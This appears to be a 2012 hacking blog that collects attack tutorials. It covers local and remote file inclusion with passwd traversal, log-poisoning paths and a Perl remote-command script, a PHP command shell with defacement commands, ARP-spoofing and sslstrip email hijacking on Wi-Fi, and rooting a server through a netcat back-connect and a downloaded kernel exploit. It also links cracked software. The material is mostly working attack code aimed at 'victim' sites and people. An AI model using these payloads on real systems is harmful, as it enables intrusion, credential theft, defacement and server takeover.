Pages

Sunday, September 30, 2012

10 Good & Free VPN

A compact Web Apps Vulnerable Scanner for amateur pentester [SecScan]

In window OS you need to install python language.

++++++++++++++++++++++++++++++++++
+ = Advance Web Apps Scanner = +
+ +
+ by +
+ +
+ Black Tiger Security +
+ +
+ now available +
+ +
+ in public Posted Image +
++++++++++++++++++++++++++++++++++

Please choose one of these options below (enter numbers only):

=== Scanners:

[[READ: you don't have to enter
inurl, just stuff like
index.php?id= or .aspx?id=]]

[1] SQLi
[2] LFI
[3] XSS
[4] RFI

=== Other Tools:

[5] Route Checker
[6] Admin Page Finder
[7] Sub Domain Scan
[8] Dic MD5 cracker
[9] Online/Rainbow MD5 cracker
[10] Check local IP address 

  
https://code.google..../downloads/list

 
credit : BTsecruity 

LFI and RFI videos tutorials

Basic Example of Local File Intrusion (LFI)





Remote File Inclusion Vulnerability[RFI] Hack





Shell upload via SQLi & LFI

 

 

 

 Local File Inclusion + Remote File Inclusion Defacing by 1nj3cth4x / Darkc0ke (HD)

 

credit to uploaders 

Friday, September 28, 2012

LFI Tutorial (local file inclusion)

This tutorial will guide you into the process of exploiting a website thru the LFI (Local File Inclusion).

First lets take a look at a php code that is vulnerable to LFI:
Code:
$page = $_GET[page];
include($page);
?>
Now, this is a piece of code that should NEVER be used, because the $page isn't sanitized and is passed directly to the webpage, but unfortunately (or not ) is very common to be find in the www world.

Ok, now that we know why is it vulnerable let's start to use this in our advantage. First let's take a look how this give us the ability to "browse" thru the web server. Let's imagine theres a file called test.php inside the test directory, if you type victim.com/test/test.php will retrive that file correct? Ok, but if the php code that we examined was in the index.php we could also retrive that file thru victim.com/index.php?page=test/test.php , see what happened there? Now, if the index.php was in victim.com/test/index.php and the test.php in victim.com/test.php you will have to type victim.com/test/index.php?page=../test.php . The ../ is called directory
transversal using that will allow you to go up in the directories.


Now that we can go up and down thru the server let's use it to access files that we are not supposed to. If this was hosted in a Unix server we can then possibly view the password file of the server, to do this you will have to type something like this (the nr of ../ may vary depending of where the vulnerable file is):
Code:
victim.com/index.php?page=../../../../../../../etc/ passwd
If you don't know what to do with the content of etc/passwd then continue reading! The etc/passwd is where the users/passwords are stored, a non shadowed passwd file will look like this:



username: passwd:UID:GID:full_name:directory:shell

For example:


username:kbeMVnZM0oL7I:503:100:FullName:/home/user name:/bin/sh

All you need to do then is grab the username and decode the password. If the passwd file is shadowed then you'll see something like this:


username:x:503:100:FullName:/home/username:/bin/sh

As you can see the password is now a x and the encoded password is now in /etc/shadow (you will probably not have access to etc/shadow because is only readable/writeable by root and etc/passwd has to be readable by many
processes, thats why you have access to it).

You can also sometimes see something like this:



username:!:503:100:FullName:/home/username:/bin/sh

The ! indicates that the encoded password is stored in the etc/security/passwd file.

Heres a couple of places that may be interesting to "visit":
Code:
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
You will probably need to google for it as this is not the right tutorial to it.

Just one more quick thing, its also common to find a vulnerable code like:
Code:
$page = $_GET["page"];
include("$page.php");
?>
In this case as you can see it will add a .php in the end of whatever you include! So if you type in your browser:
Code:
victim.com/index.php?file=../../../../../../../../ etc/passwd
it will retrieve:
victim.com/index.php?file=../../../../../../../../ etc/passwd.php that file don't exist, and you will see an error message, so you need to apply the null byte ():
Code:
victim.com/index.php?file=../../../../../../../../ etc/passwd
With the null byte the server will ignore everything that comes after .



There are other ways to use the LFI exploit, so continue reading, the REALLY fun is about to begin!


We will now gonna try to run commands on the server, we will do this by injecting php code in the httpd logs and then access them by the LFI! To do this first find out where the logs are stored, here is some locations that may be useful to you:
Code:
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/access. log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_l og
../../../../../../../usr/local/apache/logs/error.l og
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
Ok, now that you know where the logs are take a look at them and see what they store, at this example we will use a log that stores the "not found files" and the php code . You will then type at your browser victim.com/ and the php code will be logged because it "dosen't exist".

This possibly won't work because if you go look into the log you will probably see the php code like this:
Code:
%3C?%20passthru($_GET[cmd])%20?>
because your browser will url encode the whole thing! So you'll need to use something else, if you don't have a script of your own you can use this perl script i've wrote:
Code:
#!/usr/bin/perl -w
use IO::Socket;
use LWP::UserAgent;
$site="victim.com";
$path="/folder/";
$code="";
$log = "../../../../../../../etc/httpd/logs/error_log";

print "Trying to inject the code";

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "
Connection Failed.

";
print $socket "GET ".$path.$code." HTTP/1.1
";
print $socket "User-Agent: ".$code."
";
print $socket "Host: ".$site."
";
print $socket "Connection: close

";
close($socket);
print "
Code $code sucssefully injected in $log
";

print "
Type command to run or exit to end: ";
$cmd = ;

while($cmd !~ "exit") {

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "
Connection Failed.

";
print $socket "GET ".$path."index.php=".$log."&cmd=$cmd HTTP/1.1
";
print $socket "Host: ".$site."
";
print $socket "Accept: */*
";
print $socket "Connection: close

";

while ($show = <$socket>)
{
print $show;
}

print "Type command to run or exit to end: ";
$cmd = ;
}
Copy/paste that, save it as whatever.pl and change what is in bold accordingly to your victim site. If the vulnerable code is in victim.com/main/test.php you should change the /folder/ to /main/ , index.php= to test.php= and the ../../../../../../../etc/httpd/logs/error_log to where the log is at!

That script will inject the code and then will ask you for a command to run on the server! You know what to do now!


Last but not least we will take a look on how to use the avatar/image upload funtion found in a lot of web aplications.
You possibly have seen this in the "Local JPG Shell injection video" at milw0rm, but the best part here that was not mentioned is that the web aplication DOES N'T need to be installed on your victim website!

This is a quick explanation, for a better understanding you can view the video at :
Code:
http://www.milw0rm.com/video/watch.php?id=57
OR, IF you want a private way to upload shell in the server visit this link :
Code:
http://per1ova.com/showthread.php?t=400
This article is in the PREMIUM AREA so you need to be a VIP member

You need to "insert" the php code you want to execute inside the image, to do this you'll need to use your favorite hex editor or you can use the edjpgcom program (all you need to do is right click on the image, open with..., then select the edjpgcom program and then just type the code). Ok now that you have your shell in the image all you need to do is upload it! If your victim.com has a forum or something else that allows you to upload great, if not check if its in a shared hosting, if so do a reverse lookup on it!


Now that you have a list of potential sites that may have a forum or something else that allows you to upload your image all you need to do is take some time to browse thru them until you find one!


After you found one and have uploaded your image here is tricky part, you'll need to "create" an error on it (in order to find the server path to it)! Try per example create an mysql error and you will get something like this:
Code:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sitefolder/public_html/includes/view.php on line 37
If you can't force an error go back to the etc/passwd file:

Code:
username:kbeMVnZM0oL7I:503:100:FullName:/home/username:/bin/sh
As you can see the username is also the directory name, most of the times the name is similar to the domain name, but if not the case you'll have to try them until you find the one you're looking for!


Go to your avatar image right click on it and then properties (write down the path to it), you'll now all set up.

In your browser type this (again, the nr of ../ may vary):
Code:
victim.com/index.php=../../../../../../../../../ho me/the_other_site_dir/public_html/path_to_your_avatar/avatar.jpg
In order "words" should look like this (using fictitious "names"):

Code:
victim.com/index.php=../../../../../../../../../ho me/arcfull/public_html/forum/uploads/avatar.jpg
After you type this you will see the result of the code inserted in the image!


source : http://penetrationengineer.blogspot.com/ 

Privitize - free VPN (sweden) & AUTO HIDE IP 5.1.8.6 + Crack

Privitize 
http://privitize.com....ent%2F.torrent

virus scan
https://www.virustot...643e7/analysis/



AUTO HIDE IP 5.1.8.6 + Crack
Key Features
  • Anonymous Web Surfing
    Assign you fake IP addresses which will make hackers taken in, by this way, your IP could be disguised from online predators.
  • Protect Your Identity
    Hide your real IP when surfing the web to prevent hackers or identity thieves from monitoring your web activity or stealing your personal information such as your financial information.
  • Choose IP Country
    You decide to use fake IP from different countries via "Choose IP Country" option and you can check the current IP directly.
  • Send Anonymous E-mails
    Hide your real IP address in email headers. Be protected in email-sending from Yahoo!, Hotmail and GMail, etc.
  • Un-ban Yourself from Forums and Message Boards
    Use Auto Hide IP to change your IP, then you can get access to any forums or restricted websites that have banned you.
http://www.uploadbaz.com/5xs1vcvfmhg1

http://jumbofiles.com/q90pz5enwqzu

Virus Scan
https://www.virustot...e088d/analysis/

Credit: Members from ABH 

Thursday, September 27, 2012

A simple tutorial on Remote File Inclusion (RFI)

RFI stands for Remote File Inclusion, and it allows the attacker to upload a custom coded/malicious file on a website or server using a script. A simple tutorial to Remote File Inclusion (RFI) - theprohack.comThe vulnerability  exploit the poor validation checks in websites and can eventually lead to code execution on server or code execution on website (XSS attack using javascript). This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of tutorial, i suppose you will know what it is all about and may be able to deploy an attack or two.
RFI is a common vulnerability, and trust me all website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and do almost anything (including gagging them out or beg..well that's an exaggeration but I guess you get the idea :P ) . What makes it more dangerous is that you only need to have your common sense and basic knowledge of PHP to execute this one, some BASH might come handy as most of servers today are hosted on Linux..
Okay..Lets start..The first step is to find vulnerable site..you can easily find them using Google dorks..If you don't have any idea, you might want to read about advanced password hacking using Google dorks or to use automated tool to apply Google dorks using Google. Now lets assume we have found a vulnerable website
As you can see, this website pulls documents stored in text format from server and renders them as web pages. We can find ways around it as it uses PHP include function to pull them out..check it out.
I have included a custom script “eveilscript” in text format from my website, which contains some code..Now..if its a vulnerable website, then 3 cases happen -
  • Case 1 - You might have noticed that the url consisted of “”page=home” had no extension, but I have included an extension in my url,hence the site may give an error like “failure to include evilscript.txt.txt”, this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
  • Case 2 - In case, it automatically appends something in the lines of .php then we have to use a null byte “” in order to avoid error.
  • Case 3 – successfull execution :)
Now once you have battled around this one, you might want to learn what to code inside the script. You may get a custom coded infamous C99 script (too bloaty but highly effective once deployed) or you might code yourself a new one. For this knowledge of PHP might come in handy. Here we go
<?php
echo "<script>alert(U 4r3 0wn3d !!);</script>"; 
echo "Run command: ".htmlspecialchars($_GET['cmd']);
system($_GET['cmd']);
?>
The above code allows you to exploit include function and tests if the site if RFI (XSS) vulnerable by running the alert box code and if successful, you can send custom commands to the linux server in bash. So…If you are in luck and if it worked, lets try our hands on some Linux commands. For example to find the current working directory of server and then to list files, we will be using “pwd” and “ls” commands.
What it does is that it sends the command as cmd we put in our script, and begins print the working directory and list the documents..Even better..you can almost make the page proclaim that you hacked it by using the “echo” command..
cmd=echo U r pwn3d by xero> index.php
It will then re-write the index.php and render it..In case,its a primitive website which stores pages with .txt extension, you might want to put it with along the .txt files.Now..as expected..We are now the alpha and the omega of the website :) we can download, remove, rename, anything! Want to download stuff ? try the “wget” function (cmd=wget.. get the idea..)..Want to move it out ? “mv”..
I leave the rest on your creativity..
source : http://www.theprohack.com 

Wednesday, September 26, 2012

E-mail Hijacking on BackTrack 5 R3

1.Working Wireless Lan Card and connected to any hotspot
2. SSLStrip installted
3. Etthercap installed 
4.urlsniffer installed 
5. aprspoof installed All will come pre-installed on BT 5 

Step 1: In the first step we have to make sure that we are connected to a Wifi network and scan the available online node by using any network scanning software 

Step 2: One we know find the victim run this command and keep it running on the shell. This command will spoof the ARP request towards your PC arpspoof -i wlan0 -t 192.168.2.149 192.168.2.1 Explanation: aprspoof -i Network interface card IP-OF-VICTIM ROUTER-IP-ADDRESS Where -i switch is to define the interface in my case I used wireless so its wlan0 if you are trying it over ethernet it would be your appropiate eth0 or eth1 devices if you have more then one network interface card 

Step 3: Now open another shell and execute the sslstrip Note: If you are running BackTrack 5 then goto /pentest/web/sslstrip ./sslstrip -a -k -f Keep this shell open and do not close 

Step 4: ettercap -Tq -L etterlogs -i wlan0 Also do not close this shell and keep it open. this is the shell where you will actually see the password 

Step 5: Open another shell and run this command urlsnarf -v -i wlan0 This command will show you real time as your victim surf the internet 

Step 6: Enable IP Forwarding on your linux box execute the below command echo 1 > /proc/sys/net/ipv4/ip_forward 

 Step 7: As a final step we have to create this below rule into IP Tables iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000 Once all is done you will start seeing victim internet browing in the window that you opened in Step 5. Be patient till you see the customer logging into a website. If he is already logged in you will not be able to get his password.

credit to Gerti1 

Rooting Tutorial


What we need?
-RFI Vulnerable Script-PHP Shell
-Netcat
-Brains
First of all, we need to get a shell on a site. For this tutorial i will be using MulCi Shell.
So, once you have it on a site, go to the 'Backdoor Host' tab and forward a port. 
Now, go to the 'Back Connect' tab and insert the following settings: 
1- Your IP Address. 2-The port you forwarded.
Now, go on CMD and type in:cd 'Path To Your Netcat.exe' and then you need to make netcat listen to the port you forwarded.To do this, type:nc -l -n -v -p port 
It looked like this for me: 
Microsoft Windows XP [Version 5.1.2600] © Copyright 1985-2001 Microsoft Corp.
C:\FeAR>cd C:\ 
C:\>cd WINDOWS 
C:\WINDOWS>nc -l -n -v -p 4444 listening on [any] 4444 ...
Now, when you have netcat listening to the port you forwarded, click 'Connect'. 
When your connected, type 'whoami'.You shouldnt have root. 
Now, to find an exploit to root the box, you need to know whats the kernel version.To do this, just type 'uname -a'. 
It should look something like this: 
Code:Linux linux1.dmehosting.com 2.6.17-92.1.10.el5PAE #1 SMP Tue Aug 5 08:14:05 EDT 2008 i686

Now, we go on exploit-db.com and we will look for '2.6.17'.
Code:
hhttp://www.exploit-db.com/exploits/5092/


Now, we type 'wget http://www.exploit-db.com/exploits/5092/ on the netcat window.
Code:
wget http://xpl_url.com


So the exploit works, you must compile it in the server(gcc) and execute it via exploit(-o).

To do this we type 'gcc 5092 -o exploit'.
 
Code:
gcc 5092 -o exploit


5092- After the url path.http://www.site.com/5092.
exploit- Output name.


Now you can execute your exploit by typing './exploit'
 

Wait for the exploit to finish running and type root again.
 

It should output in something like this:
 
Code:
uid=0(root) gid=0(root) groups=500(apache)


This means you have successfully rooted the box :).

There are more ways to do this, this is the way I usually do it.
 

Credit to :Darlixus